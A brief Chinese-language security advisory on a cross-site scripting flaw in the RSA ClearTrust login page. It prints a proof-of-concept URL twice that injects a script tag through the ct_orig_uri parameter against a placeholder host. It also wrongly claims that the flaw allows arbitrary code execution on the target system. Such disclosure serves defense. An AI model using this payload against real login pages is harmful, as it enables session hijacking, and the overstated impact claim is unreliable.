涉及程序： RSA ClearTrust 描述： RSA ClearTrust 存在跨站脚本执行缺陷 详细： RSA ClearTrust 是一款WEB访问管理程序，使用单点登录技术(single sign-on)帮助用户安全的访问WEB资源。RSA ClearTrust软件通过8212端口作用于Intranets，Extranets, Portals和Exchange基础结构内部。 RSA ClearTrust的登录页面存在跨站脚本执行缺陷，攻击者使用下列通过向目标机器提供下列格式的URL请求，能引发该缺陷： https://victim.com/cleartrust/ct_logon.asp?CTLoginErrorMsg= https://victim.com/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\" 利用该缺陷能导致攻击者在目标系统上执行任意代码。 攻击方法： 示例代码： https://victim.com/cleartrust/ct_logon.asp?CTLoginErrorMsg= https://victim.com/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\" 解决方案： 目前厂商未公布该缺陷补丁，请用户及时关注厂商站点： http://www.rsasecurity.com/